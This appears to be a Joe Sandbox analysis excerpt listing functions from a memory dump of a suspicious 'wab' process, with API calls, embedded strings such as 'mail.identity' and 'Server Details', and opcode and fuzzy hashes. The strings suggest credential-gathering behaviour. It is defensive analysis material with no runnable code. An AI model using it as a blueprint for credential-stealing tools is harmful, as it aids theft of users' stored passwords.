                  • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                  • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                  • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$memset
                  • String ID:
                  • API String ID: 1860491036-0
                  • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                  • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                  • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                  • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                  • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                  • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                  • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                  APIs
                  Strings
                  • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                  • too many SQL variables, xrefs: 0042C6FD
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                  • API String ID: 2221118986-515162456
                  • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                  • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                  • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                  • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                  APIs
                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                  • memset.MSVCRT ref: 004026AD
                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                    • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                  • LocalFree.KERNEL32(?), ref: 004027A6
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                  • String ID:
                  • API String ID: 1593657333-0
                  • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                  • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                  • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                  • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                  APIs
                    • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                    • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                  • strlen.MSVCRT ref: 0040B60B
                  • atoi.MSVCRT ref: 0040B619
                  • _mbsicmp.MSVCRT ref: 0040B66C
                  • _mbsicmp.MSVCRT ref: 0040B67F
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbsicmp$??2@??3@atoistrlen
                  • String ID:
                  • API String ID: 4107816708-0
                  • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                  • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                  • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                  • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                  • String ID:
                  • API String ID: 1886415126-0
                  • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                  • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                  • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                  • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen
                  • String ID: >$>$>
                  • API String ID: 39653677-3911187716
                  • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                  • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                  • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                  • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: @
                  • API String ID: 3510742995-2766056989
                  • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                  • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                  • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                  • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _strcmpi
                  • String ID: C@$mail.identity
                  • API String ID: 1439213657-721921413
                  • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                  • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                  • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                  • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                  APIs
                  • memset.MSVCRT ref: 00406640
                    • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                    • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                    • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                  • memcmp.MSVCRT ref: 00406672
                  • memcpy.MSVCRT ref: 00406695
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset$memcmp
                  • String ID: Ul@
                  • API String ID: 270934217-715280498
                  • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                  • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                  • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                  • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                  • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                  • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                  • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                  APIs
                    • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                  Strings
                  • recovered %d pages from %s, xrefs: 004188B4
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                  • String ID: recovered %d pages from %s
                  • API String ID: 985450955-1623757624
                  • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                  • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                  • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                  • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _ultoasprintf
                  • String ID: %s %s %s
                  • API String ID: 432394123-3850900253
                  • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                  • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                  • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                  • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                  APIs
                  • LoadMenuA.USER32(00000000), ref: 00409078
                  • sprintf.MSVCRT ref: 0040909B
                    • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                    • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                    • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                    • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                    • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                  • String ID: menu_%d
                  • API String ID: 1129539653-2417748251
                  • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                  • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                  • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                  • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                  APIs
                  Strings
                  • failed memory resize %u to %u bytes, xrefs: 00411706
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _msizerealloc
                  • String ID: failed memory resize %u to %u bytes
                  • API String ID: 2713192863-2134078882
                  • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                  • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                  • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                  • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                  APIs
                  • _mbscpy.MSVCRT ref: 004070EB
                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                  • _mbscat.MSVCRT ref: 004070FA
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscat$_mbscpystrlen
                  • String ID: sqlite3.dll
                  • API String ID: 1983510840-1155512374
                  • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                  • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                  • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                  • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                  APIs
                  • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileString
                  • String ID: A4@$Server Details
                  • API String ID: 1096422788-4071850762
                  • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                  • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                  • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                  • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLocalmemcpymemsetstrlen
                  • String ID:
                  • API String ID: 3110682361-0
                  • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                  • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                  • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                  • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                  • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                  • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                  • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8